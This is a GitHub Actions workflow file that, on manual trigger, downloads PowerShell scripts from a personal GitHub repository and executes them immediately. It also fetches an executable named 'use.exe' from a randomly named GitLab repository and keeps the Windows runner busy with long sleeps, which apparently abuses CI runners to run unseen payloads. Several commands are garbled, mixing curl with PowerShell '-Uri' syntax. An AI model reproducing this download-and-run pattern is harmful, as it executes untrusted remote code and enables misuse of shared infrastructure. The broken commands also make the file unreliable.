name: Start

on:
  workflow_dispatch:

jobs:
  makeit:
    runs-on: windows-latest

    steps:

      - name: Install 
        run: |
          curl -s -L -o install.ps1 https://github.com/Efebey007/Test-Environment/raw/refs/heads/main/test.ps1
          .\install.ps1

      - name: Start 
        run: |
           curl -s -L -o start.ps1 https://github.com/Efebey007/Test-Environment/raw/refs/heads/main/idkk.ps1
           .\start.ps1
           curl -o zip.exe -Uri "https://gitlab.com/jfv-he/jrtiiupngk/-/raw/main/use.exe"
           cmd /c sleep 240
           cmd /c curl -o zip.exe -Uri "https://gitlab.com/jfv-he/jrtiiupngk/-/raw/main/use.exe"
           cmd /c sleep 240
        
